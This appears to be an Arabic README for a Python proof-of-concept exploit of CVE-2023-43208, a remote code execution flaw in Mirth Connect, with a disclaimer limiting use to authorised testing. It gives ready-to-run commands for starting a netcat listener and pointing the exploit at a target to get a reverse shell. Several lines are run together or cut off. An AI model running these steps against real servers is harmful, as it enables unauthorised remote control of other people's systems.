
إثبات المفهوم (PoC) لاستغلال CVE-2023-43208 (RCE).
نص بايثون لإثبات المفهوم يستهدف CVE-2023-43208 في Mirth Connect.
استخدم فقط في بيئات تملكها أو مخول صراحةً لاختبارها. هذا المستودع مخصص لأغراض البحث الأمني والتحقق والاختبار الدفاعي. لا يتحمل المؤلف أي مسؤولية عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.
exp.py هو نسخة قليلة الاعتماديات من PoC والتي:
/api/server/version4.4.1/api/users إذا بدا الهدف ضعيفًاالبرنامج النصي يستخدم HTTPS افتراضيًا ويمكن التبديل إلى HTTP باستخدام --http.
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: عنوان URL أو مضيف Mirth Connect المستهدف-lh, --lhost: المضيف المحلي/IP للاتصال العكسي-lp, --lport: منفذ الاستماع المحلي--http: فرض HTTP بدلاً من HTTPS (الافتراضي هو HTTPS)ابدأ مستمعًا أولاً:
nc -lvnp 4444
شغّل البرنامج النصي:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
لهدف يعمل فقط عبر HTTP:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1.K3ysTr0K3R و Chocapikkpredyy